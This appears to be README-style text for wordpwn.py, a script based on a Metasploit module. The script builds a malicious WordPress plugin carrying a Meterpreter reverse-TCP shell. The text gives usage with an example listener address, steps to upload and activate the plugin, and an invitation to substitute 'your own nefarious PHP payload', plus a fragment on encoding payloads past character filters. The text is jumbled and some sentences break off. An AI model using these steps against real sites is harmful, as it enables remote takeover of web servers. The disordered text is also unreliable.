Rob Carr is the author of the Metasploit module wp_admin_shell_upload, which this script is based on. I want to be 100% sure that I give credit to Rob Carr.

Note: if the script usage is still a mystery to you, JavaRockstar has made a tutorial on his website HackingVision about it.

Once the plugin is installed and activated, just navigate to the following URLs to launch the reverse shell:

Upload this zip file as a new plugin (by browsing to the URL

Once uploaded, you have to activate the plugin.

Be sure to start our listener (if you didn't specify the handler with the Y option)!

since by default the plugin will be made using a php/meterpreter/reverse_tcp reverse shell. If you have your own nefarious PHP payload simply adjust the script to accept it.

After the script is run, a zip file (the plugin) called malicious.zip will be created in the current directory (and a handler will be started if you specified it with the Y option).

You are also given the option to start a handler, I recommend that you do. Usage is super simple, simply pass wordpwn your listening address and listening port and execute the script.

Usage: wordpwn.py

Example: wordpwn.py 192.168.0.6 8888 Y

How and When do I use this?

Useful if you're exploiting a PHP injection vulnerability with character restrictions.

Will generate a payload that looks like this.
This also applies to PHP payloads as well, banning double quotes for a PHP payload will generate the payload in (almost all, sometimes it isn't fully) base64. Most of you are probably aware that when you're generating standard payloads (say a linux reverse shell) you can block certain hex values in your payload.